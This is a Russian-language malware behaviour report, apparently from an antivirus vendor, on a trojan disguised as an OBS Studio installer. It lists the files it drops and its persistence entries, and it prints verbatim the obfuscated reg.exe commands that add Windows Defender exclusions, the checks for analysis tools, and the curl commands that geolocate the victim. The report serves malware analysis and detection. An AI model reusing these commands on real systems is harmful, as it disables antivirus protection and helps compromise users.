Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\obs studio.lnk
- <SYSTEM32>\tasks\ar
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
- [<HKLM>\SOFtWare\mICrosoFt\WindowS deFender\excluSionS\eXTeNsIonS] 'dLL' = '00000000'
- [<HKLM>\sOfTWAre\MiCrOSofT\WINdOWs deFender\eXCLuSIONS\extenSiONs] 'SCr' = '00000000'
- [<HKLM>\SOFTWare\micrOsOfT\WIndOWS defeNder\excLUsions\exTensiOnS] 'Cmd' = '00000000'
- [<HKLM>\SOFTwAre\MIcroSoFT\windOWs deFeNder\exClusIOnS\eXtenSiOnS] 'eXe' = '00000000'
- [<HKLM>\SOFTware\microSofT\WindOwS deFender\eXCluSIONS\pAThS] '<DRIVERS>\eTc\hOstS' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /f /im "obs64.scr"
Ищет следующие окна с целью
обнаружения утилит для анализа:
- ClassName: 'RegmonClass', WindowName: ''
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\is-n3mbv.tmp\<Имя файла>.tmp
- %TEMP%\aut6671.tmp
- %TEMP%\1l5o4l0j.tmp
- %TEMP%\aut6660.tmp
- %WINDIR%\temp\aut646f.tmp
- %WINDIR%\temp\aut645e.tmp
- %WINDIR%\temp\1l5o8l4j.tmp
- %WINDIR%\temp\aut645d.tmp
- %TEMP%\aut58cb.tmp
- %TEMP%\aut58bb.tmp
- %TEMP%\2x7f8x4p.tmp
- %TEMP%\aut585c.tmp
- %WINDIR%\temp\aut6b6f.tmp
- %TEMP%\aut696e.tmp
- %WINDIR%\temp\1x4f6x0p.tmp
- %WINDIR%\temp\aut57df.tmp
- %WINDIR%\temp\aut52f2.tmp
- %WINDIR%\temp\aut52e1.tmp
- %WINDIR%\temp\2d1q7s6l.tmp
- %WINDIR%\temp\aut5282.tmp
- %TEMP%\aut4693.tmp
- %TEMP%\aut45f6.tmp
- %TEMP%\1t6e9t6u.tmp
- %TEMP%\aut45d6.tmp
- %WINDIR%\temp\aut4396.tmp
- %WINDIR%\temp\aut5810.tmp
- %APPDATA%\obs-studio\bin\64bit\is-b1n5o.tmp
- %WINDIR%\temp\2y8z2y8h.tmp
- %WINDIR%\temp\2m8m3r2t.tmp
- %WINDIR%\temp\aut98d5.tmp
- %APPDATA%\obs-studio\bin\64bit\.vbs
- %APPDATA%\obs-studio\bin\64bit\.cmd
- %WINDIR%\temp\aut8c59.tmp
- %WINDIR%\temp\aut8beb.tmp
- %WINDIR%\temp\1g7t6t8q.tmp
- %WINDIR%\temp\aut8bca.tmp
- %WINDIR%\temp\aut891e.tmp
- %WINDIR%\temp\aut88ee.tmp
- %WINDIR%\temp\2l4f8r4s.tmp
- %WINDIR%\temp\aut88ce.tmp
- %WINDIR%\temp\aut7a30.tmp
- %WINDIR%\temp\aut7983.tmp
- %WINDIR%\temp\2o8s8f4v.tmp
- %WINDIR%\temp\aut7973.tmp
- %TEMP%\aut783d.tmp
- %TEMP%\aut782c.tmp
- %TEMP%\2o9s8f4v.tmp
- %TEMP%\aut781c.tmp
- %WINDIR%\temp\aut75dc.tmp
- %WINDIR%\temp\aut75cc.tmp
- %WINDIR%\temp\0slr8m4q.tmp
- %WINDIR%\temp\aut75bb.tmp
- %WINDIR%\temp\aut6b90.tmp
- %WINDIR%\temp\aut4386.tmp
- %WINDIR%\temp\aut57ff.tmp
- %WINDIR%\temp\8csh8m6x.tmp
- %WINDIR%\temp\aut42e9.tmp
- %TEMP%\aut3506.tmp
- %APPDATA%\obs-studio\bin\64bit\is-6h0a8.tmp
- %APPDATA%\obs-studio\bin\64bit\platforms\is-bar12.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-7h3m2.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-brs2n.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-gkgma.tmp
- %APPDATA%\obs-studio\bin\64bit\iconengines\is-cbh7s.tmp
- C:\tmp\is-46b6e.tmp
- %APPDATA%\obs-studio\bin\64bit\is-bdvfd.tmp
- %APPDATA%\obs-studio\bin\64bit\is-t2f68.tmp
- %APPDATA%\obs-studio\bin\64bit\is-iqbcf.tmp
- %APPDATA%\obs-studio\bin\64bit\is-8btco.tmp
- %APPDATA%\obs-studio\bin\64bit\is-41igf.tmp
- %APPDATA%\obs-studio\bin\64bit\is-gmp52.tmp
- %APPDATA%\obs-studio\bin\64bit\is-o9fu6.tmp
- %APPDATA%\obs-studio\bin\64bit\is-9frq9.tmp
- %APPDATA%\obs-studio\bin\64bit\is-6r0m5.tmp
- %APPDATA%\obs-studio\bin\64bit\is-gob5j.tmp
- %APPDATA%\obs-studio\bin\64bit\is-juqbu.tmp
- %APPDATA%\obs-studio\bin\64bit\is-slhk8.tmp
- %APPDATA%\obs-studio\bin\64bit\is-clako.tmp
- %TEMP%\is-qu1fg.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-qu1fg.tmp\_isetup\_setup64.tmp
- %TEMP%\is-vpk2i.tmp\<Имя файла>.tmp
- %TEMP%\is-uk07p.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-uk07p.tmp\_isetup\_setup64.tmp
- %WINDIR%\temp\aut9905.tmp
- %WINDIR%\temp\aut6b70.tmp
- %APPDATA%\obs-studio\bin\64bit\is-8f4ud.tmp
- %APPDATA%\obs-studio\bin\64bit\is-4sjpi.tmp
- %APPDATA%\obs-studio\bin\64bit\styles\is-tbeb6.tmp
- %TEMP%\aut3479.tmp
- %TEMP%\4enc5r8e.tmp
- %TEMP%\aut342a.tmp
- %TEMP%\is-qu1fg.tmp\temp\.cmd
- C:\tmp\.vbs
- C:\tmp\.cmd
- %APPDATA%\obs-studio\bin\64bit\is-a7h37.tmp
- %APPDATA%\obs-studio\bin\64bit\is-st5it.tmp
- %APPDATA%\obs-studio\bin\64bit\is-63pct.tmp
- %APPDATA%\obs-studio\bin\64bit\is-ntlub.tmp
- %APPDATA%\obs-studio\bin\64bit\is-sream.tmp
- %APPDATA%\obs-studio\bin\64bit\is-g7u9q.tmp
- %APPDATA%\obs-studio\bin\64bit\is-o5dkf.tmp
- %APPDATA%\obs-studio\bin\64bit\is-0aiq2.tmp
- %APPDATA%\obs-studio\bin\64bit\is-pfjue.tmp
- %APPDATA%\obs-studio\bin\64bit\is-1aij5.tmp
- %APPDATA%\obs-studio\bin\64bit\is-dso2u.tmp
- %APPDATA%\obs-studio\bin\64bit\is-8f6qb.tmp
- %APPDATA%\obs-studio\bin\64bit\is-8easm.tmp
- C:\tmp\is-t6s86.tmp
- %APPDATA%\obs-studio\bin\64bit\is-cgfgi.tmp
- %APPDATA%\obs-studio\bin\64bit\is-flraf.tmp
- %TEMP%\is-qu1fg.tmp\temp\is-ou07n.tmp
- %APPDATA%\obs-studio\bin\64bit\is-od2m7.tmp
- %APPDATA%\obs-studio\bin\64bit\is-3s89m.tmp
- %WINDIR%\temp\aut9954.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\obs-studio\bin\64bit\ar.xml
- C:\tmp\mainicon.ico
- %TEMP%\is-qu1fg.tmp\temp\r.exe
- C:\tmp\obs32.dll
- %APPDATA%\obs-studio\bin\64bit\obs64.scr
- %APPDATA%\obs-studio\bin\64bit\.cmd
- %APPDATA%\obs-studio\bin\64bit\.vbs
Удаляет следующие файлы
- %TEMP%\is-uk07p.tmp\_isetup\_setup64.tmp
- %WINDIR%\temp\2o8s8f4v.tmp
- %WINDIR%\temp\aut7a30.tmp
- %WINDIR%\temp\aut7983.tmp
- %WINDIR%\temp\aut7973.tmp
- %TEMP%\2o9s8f4v.tmp
- %TEMP%\aut783d.tmp
- %WINDIR%\temp\aut88ce.tmp
- %TEMP%\aut782c.tmp
- %WINDIR%\temp\0slr8m4q.tmp
- %WINDIR%\temp\aut75dc.tmp
- %WINDIR%\temp\aut75cc.tmp
- %WINDIR%\temp\aut75bb.tmp
- %WINDIR%\temp\2y8z2y8h.tmp
- %WINDIR%\temp\aut6b90.tmp
- %TEMP%\aut781c.tmp
- %WINDIR%\temp\aut9905.tmp
- %TEMP%\is-qu1fg.tmp\_isetup\_shfoldr.dll
- %WINDIR%\temp\2l4f8r4s.tmp
- %TEMP%\is-qu1fg.tmp\_isetup\_setup64.tmp
- %TEMP%\is-qu1fg.tmp\temp\r.exe
- C:\tmp\obs32.dll
- C:\tmp\mainicon.ico
- %APPDATA%\obs-studio\bin\64bit\ar.xml
- %WINDIR%\temp\2m8m3r2t.tmp
- %WINDIR%\temp\aut6b70.tmp
- %WINDIR%\temp\aut9954.tmp
- %WINDIR%\temp\aut98d5.tmp
- %WINDIR%\temp\1g7t6t8q.tmp
- %WINDIR%\temp\aut8c59.tmp
- %WINDIR%\temp\aut8beb.tmp
- %WINDIR%\temp\aut8bca.tmp
- %TEMP%\is-qu1fg.tmp\temp\.cmd
- %WINDIR%\temp\aut88ee.tmp
- %WINDIR%\temp\aut891e.tmp
- %WINDIR%\temp\aut6b6f.tmp
- %WINDIR%\temp\aut52f2.tmp
- %TEMP%\1t6e9t6u.tmp
- %TEMP%\aut4693.tmp
- %TEMP%\aut45f6.tmp
- %TEMP%\aut45d6.tmp
- %WINDIR%\temp\8csh8m6x.tmp
- %WINDIR%\temp\aut4396.tmp
- %WINDIR%\temp\aut5282.tmp
- %WINDIR%\temp\aut4386.tmp
- %TEMP%\4enc5r8e.tmp
- %TEMP%\aut3506.tmp
- %TEMP%\aut3479.tmp
- %TEMP%\aut342a.tmp
- %TEMP%\is-n3mbv.tmp\<Имя файла>.tmp
- %TEMP%\is-uk07p.tmp\_isetup\_shfoldr.dll
- %WINDIR%\temp\aut42e9.tmp
- %TEMP%\aut58cb.tmp
- %TEMP%\aut696e.tmp
- %WINDIR%\temp\2d1q7s6l.tmp
- %TEMP%\aut6671.tmp
- %TEMP%\aut6660.tmp
- %WINDIR%\temp\1l5o8l4j.tmp
- %WINDIR%\temp\aut646f.tmp
- %WINDIR%\temp\aut645e.tmp
- %WINDIR%\temp\aut645d.tmp
- %TEMP%\1l5o4l0j.tmp
- %TEMP%\2x7f8x4p.tmp
- %TEMP%\aut58bb.tmp
- %TEMP%\aut585c.tmp
- %WINDIR%\temp\1x4f6x0p.tmp
- %WINDIR%\temp\aut5810.tmp
- %WINDIR%\temp\aut57ff.tmp
- %WINDIR%\temp\aut57df.tmp
- %WINDIR%\temp\aut52e1.tmp
- %TEMP%\is-vpk2i.tmp\<Имя файла>.tmp
Перемещает следующие файлы
- %APPDATA%\obs-studio\bin\64bit\is-clako.tmp в %APPDATA%\obs-studio\bin\64bit\libx264-164.dll
- %APPDATA%\obs-studio\bin\64bit\is-3s89m.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedx509.dll
- %APPDATA%\obs-studio\bin\64bit\is-4sjpi.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-d3d11.dll
- %APPDATA%\obs-studio\bin\64bit\is-od2m7.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-d3d11.pdb
- %TEMP%\is-qu1fg.tmp\temp\is-ou07n.tmp в %TEMP%\is-qu1fg.tmp\temp\r.exe
- %APPDATA%\obs-studio\bin\64bit\is-flraf.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-opengl.dll
- %APPDATA%\obs-studio\bin\64bit\is-cgfgi.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-opengl.pdb
- C:\tmp\is-t6s86.tmp в C:\tmp\obs32.dll
- %APPDATA%\obs-studio\bin\64bit\is-8easm.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-winrt.dll
- %APPDATA%\obs-studio\bin\64bit\is-dso2u.tmp в %APPDATA%\obs-studio\bin\64bit\obs64.scr
- %APPDATA%\obs-studio\bin\64bit\is-st5it.tmp в %APPDATA%\obs-studio\bin\64bit\w32-pthreads.pdb
- %APPDATA%\obs-studio\bin\64bit\is-1aij5.tmp в %APPDATA%\obs-studio\bin\64bit\librist.dll
- %APPDATA%\obs-studio\bin\64bit\is-pfjue.tmp в %APPDATA%\obs-studio\bin\64bit\libsrt.dll
- %APPDATA%\obs-studio\bin\64bit\is-0aiq2.tmp в %APPDATA%\obs-studio\bin\64bit\obsglad.dll
- %APPDATA%\obs-studio\bin\64bit\is-o5dkf.tmp в %APPDATA%\obs-studio\bin\64bit\obsglad.pdb
- %APPDATA%\obs-studio\bin\64bit\is-g7u9q.tmp в %APPDATA%\obs-studio\bin\64bit\qt6xml.dll
- %APPDATA%\obs-studio\bin\64bit\is-sream.tmp в %APPDATA%\obs-studio\bin\64bit\swresample-4.dll
- %APPDATA%\obs-studio\bin\64bit\is-ntlub.tmp в %APPDATA%\obs-studio\bin\64bit\swscale-6.dll
- %APPDATA%\obs-studio\bin\64bit\is-63pct.tmp в %APPDATA%\obs-studio\bin\64bit\w32-pthreads.dll
- %APPDATA%\obs-studio\bin\64bit\is-b1n5o.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedtls.dll
- %APPDATA%\obs-studio\bin\64bit\is-8f6qb.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-winrt.pdb
- %APPDATA%\obs-studio\bin\64bit\is-8f4ud.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedcrypto.dll
- %APPDATA%\obs-studio\bin\64bit\is-8btco.tmp в %APPDATA%\obs-studio\bin\64bit\obs-scripting.pdb
- %APPDATA%\obs-studio\bin\64bit\is-slhk8.tmp в %APPDATA%\obs-studio\bin\64bit\lua51.dll
- %APPDATA%\obs-studio\bin\64bit\is-juqbu.tmp в %APPDATA%\obs-studio\bin\64bit\obs-amf-test.exe
- %APPDATA%\obs-studio\bin\64bit\is-gob5j.tmp в %APPDATA%\obs-studio\bin\64bit\obs-amf-test.pdb
- %APPDATA%\obs-studio\bin\64bit\is-6r0m5.tmp в %APPDATA%\obs-studio\bin\64bit\obs-ffmpeg-mux.exe
- %APPDATA%\obs-studio\bin\64bit\is-9frq9.tmp в %APPDATA%\obs-studio\bin\64bit\obs-ffmpeg-mux.pdb
- %APPDATA%\obs-studio\bin\64bit\is-gmp52.tmp в %APPDATA%\obs-studio\bin\64bit\obs-frontend-api.dll
- %APPDATA%\obs-studio\bin\64bit\is-6h0a8.tmp в %APPDATA%\obs-studio\bin\64bit\obs-frontend-api.pdb
- %APPDATA%\obs-studio\bin\64bit\is-41igf.tmp в %APPDATA%\obs-studio\bin\64bit\obs-scripting.dll
- %APPDATA%\obs-studio\bin\64bit\is-iqbcf.tmp в %APPDATA%\obs-studio\bin\64bit\ar.xml
- %APPDATA%\obs-studio\bin\64bit\styles\is-tbeb6.tmp в %APPDATA%\obs-studio\bin\64bit\styles\qwindowsvistastyle.dll
- %APPDATA%\obs-studio\bin\64bit\is-t2f68.tmp в %APPDATA%\obs-studio\bin\64bit\obs.pdb
- %APPDATA%\obs-studio\bin\64bit\is-bdvfd.tmp в %APPDATA%\obs-studio\bin\64bit\obs64.pdb
- C:\tmp\is-46b6e.tmp в C:\tmp\mainicon.ico
- %APPDATA%\obs-studio\bin\64bit\iconengines\is-cbh7s.tmp в %APPDATA%\obs-studio\bin\64bit\iconengines\qsvgicon.dll
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-gkgma.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qgif.dll
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-brs2n.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qjpeg.dll
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-7h3m2.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qsvg.dll
- %APPDATA%\obs-studio\bin\64bit\platforms\is-bar12.tmp в %APPDATA%\obs-studio\bin\64bit\platforms\qwindows.dll
- %APPDATA%\obs-studio\bin\64bit\is-o9fu6.tmp в %APPDATA%\obs-studio\bin\64bit\libcurl.dll
- %APPDATA%\obs-studio\bin\64bit\is-a7h37.tmp в %APPDATA%\obs-studio\bin\64bit\zlib.dll
Подменяет следующие файлы
- %TEMP%\is-qu1fg.tmp\temp\.cmd
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
- ClassName: 'Registry Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: '18467-41' WindowName: ''
- ClassName: 'File Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: 'Process Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\is-n3mbv.tmp\<Имя файла>.tmp' /SL5="$11022C,14041309,160256,<Полный путь к файлу>"
- '%APPDATA%\obs-studio\bin\64bit\obs64.scr'
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /TI/ /Sw:0 reg.eXe Add "hklm\SOFTwAre\MIcroSoFT\windOWs deFeNder\exClusIOnS\eXtenSiOnS" /v eXe /T reg_dWord /d 0 /f
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /Sw:0 reg.eXe Add "hKlm\SOFTware\microSofT\WindOwS deFender\eXCluSIONS\pAThS" /V "<DRIVERS>\eTc\hOstS" /t "reG_dWOrd" /d "0" /F
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /TI/ /sW:0 reG.eXe add "hklm\SOFTWare\micrOsOfT\WIndOWS defeNder\excLUsions\exTensiOnS" /v Cmd /T reg_dwOrd /d 0 /F
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /TI/ /sw:0 reg.eXe add "hKLM\sOfTWAre\MiCrOSofT\WINdOWs deFender\eXCLuSIONS\extenSiONs" /v SCr /t reg_dWord /d 0 /f
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /TI/ /Sw:0 reg.eXe Add "hKlm\SOFTware\microSofT\WindOwS deFender\eXCluSIONS\pAThS" /V "<DRIVERS>\eTc\hOstS" /t "reG_dWOrd" /d "0" /F
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /sW:0 reG.eXe add "hklm\SOFTWare\micrOsOfT\WIndOWS defeNder\excLUsions\exTensiOnS" /v Cmd /T reg_dwOrd /d 0 /F
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /Sw:0 reg.eXe Add "hklm\SOFTwAre\MIcroSoFT\windOWs deFeNder\exClusIOnS\eXtenSiOnS" /v eXe /T reg_dWord /d 0 /f
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /sw:0 reg.eXe add "hKLM\sOfTWAre\MiCrOSofT\WINdOWs deFender\eXCLuSIONS\extenSiONs" /v SCr /t reg_dWord /d 0 /f
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /Sw:0 reg.eXe Add "hkLM\SOFtWare\mICrosoFt\WindowS deFender\excluSionS\eXTeNsIonS" /v dLL /T reg_dWOrd /d 0 /F
- '%TEMP%\is-qu1fg.tmp\temp\r.exe' /TI/ /Sw:0 reg.eXe Add "hkLM\SOFtWare\mICrosoFt\WindowS deFender\excluSionS\eXTeNsIonS" /v dLL /T reg_dWOrd /d 0 /F
- '%TEMP%\is-vpk2i.tmp\<Имя файла>.tmp' /SL5="$C021E,14041309,160256,<Полный путь к файлу>" /verysilent /sp-
- '<SYSTEM32>\reg.exe' Add "hklm\SOFTwAre\MIcroSoFT\windOWs deFeNder\exClusIOnS\eXtenSiOnS" /v eXe /T reg_dWord /d 0 /f' (со скрытым окном)
- '<SYSTEM32>\reg.exe' Add "hKlm\SOFTware\microSofT\WindOwS deFender\eXCluSIONS\pAThS" /V "<DRIVERS>\eTc\hOstS" /t "reG_dWOrd" /d "0" /F' (со скрытым окном)
- '<SYSTEM32>\reg.exe' Add "hkLM\SOFtWare\mICrosoFt\WindowS deFender\excluSionS\eXTeNsIonS" /v dLL /T reg_dWOrd /d 0 /F' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-QU1FG.tmp\temp\.cmd""' (со скрытым окном)
- '%WINDIR%\syswow64\rundll32.exe' C:\tmp\obs32.dll, Uaby' (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /f /im "obs64.scr"' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKLM\sOfTWAre\MiCrOSofT\WINdOWs deFender\eXCLuSIONS\extenSiONs" /v SCr /t reg_dWord /d 0 /f' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hklm\SOFTWare\micrOsOfT\WIndOWS defeNder\excLUsions\exTensiOnS" /v Cmd /T reg_dwOrd /d 0 /F' (со скрытым окном)
- '<Полный путь к файлу>' /verysilent /sp-' (со скрытым окном)
- '%APPDATA%\obs-studio\bin\64bit\obs64.scr' ' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\rundll32.exe' C:\tmp\obs32.dll, Uaby
- '<SYSTEM32>\rundll32.exe' C:\tmp\obs32.dll, Uaby
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-QU1FG.tmp\temp\.cmd""
- '<SYSTEM32>\reg.exe' Add "hkLM\SOFtWare\mICrosoFt\WindowS deFender\excluSionS\eXTeNsIonS" /v dLL /T reg_dWOrd /d 0 /F
- '<SYSTEM32>\reg.exe' add "hKLM\sOfTWAre\MiCrOSofT\WINdOWs deFender\eXCLuSIONS\extenSiONs" /v SCr /t reg_dWord /d 0 /f
- '<SYSTEM32>\reg.exe' add "hklm\SOFTWare\micrOsOfT\WIndOWS defeNder\excLUsions\exTensiOnS" /v Cmd /T reg_dwOrd /d 0 /F
- '<SYSTEM32>\reg.exe' Add "hklm\SOFTwAre\MIcroSoFT\windOWs deFeNder\exClusIOnS\eXtenSiOnS" /v eXe /T reg_dWord /d 0 /f
- '<SYSTEM32>\reg.exe' Add "hKlm\SOFTware\microSofT\WindOwS deFender\eXCluSIONS\pAThS" /V "<DRIVERS>\eTc\hOstS" /t "reG_dWOrd" /d "0" /F
- '%WINDIR%\syswow64\cmd.exe' /c cUrL -s ipINFO.io/Ip
- '%WINDIR%\syswow64\cmd.exe' /c cuRL -s IPINfo.Io/city
- '%WINDIR%\syswow64\cmd.exe' /c cUrl -s IPiNfo.io/country
- '%WINDIR%\syswow64\attrib.exe' +s +H %APPDATA%\obs-studio\bin\64bit\.cmD
- '%WINDIR%\syswow64\attrib.exe' +s +h %APPDATA%\obs-studio\bin\64bit\.vbs
